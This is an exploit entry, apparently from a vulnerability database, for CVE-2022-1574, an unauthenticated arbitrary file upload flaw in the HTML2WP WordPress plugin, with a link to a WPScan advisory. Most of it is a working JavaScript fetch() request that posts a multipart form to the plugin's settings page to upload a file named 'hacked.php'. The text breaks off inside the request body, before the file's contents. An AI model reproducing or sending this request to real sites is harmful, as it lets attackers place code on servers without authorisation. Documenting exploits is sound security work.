CVE: CVE-2022-1574
Name: HTML2WP (html2wp)
Version: 1.0.0
Date: 2022-04-05 20:24:14
Advisory: https://wpscan.com/vulnerability/c36d0ea8-bf5c-4af9-bd3d-911eb02adc14
Type: Unauthenticated Arbitrary File Upload
Exploit:
await fetch("https://example.com/wp-admin/admin.php?page=html2wp-settings", {
"credentials": "include",
"headers": {
"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:98.0) Gecko/20100101 Firefox/98.0",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8",
"Accept-Language": "de,en;q=0.7,en-US;q=0.3",
"Content-Type": "multipart/form-data; boundary=---------------------------7816508136577551742878603990",
"Upgrade-Insecure-Requests": "1",
"Sec-Fetch-Dest": "document",
"Sec-Fetch-Mode": "navigate",
"Sec-Fetch-Site": "cross-site",
"Sec-Fetch-User": "?1"
},
"body": "-----------------------------7816508136577551742878603990\r\nContent-Disposition: form-data; name=\"local_importing[]\"; filename=\"hacked.php\"\r\nContent-Type: text/html\r\n\r\n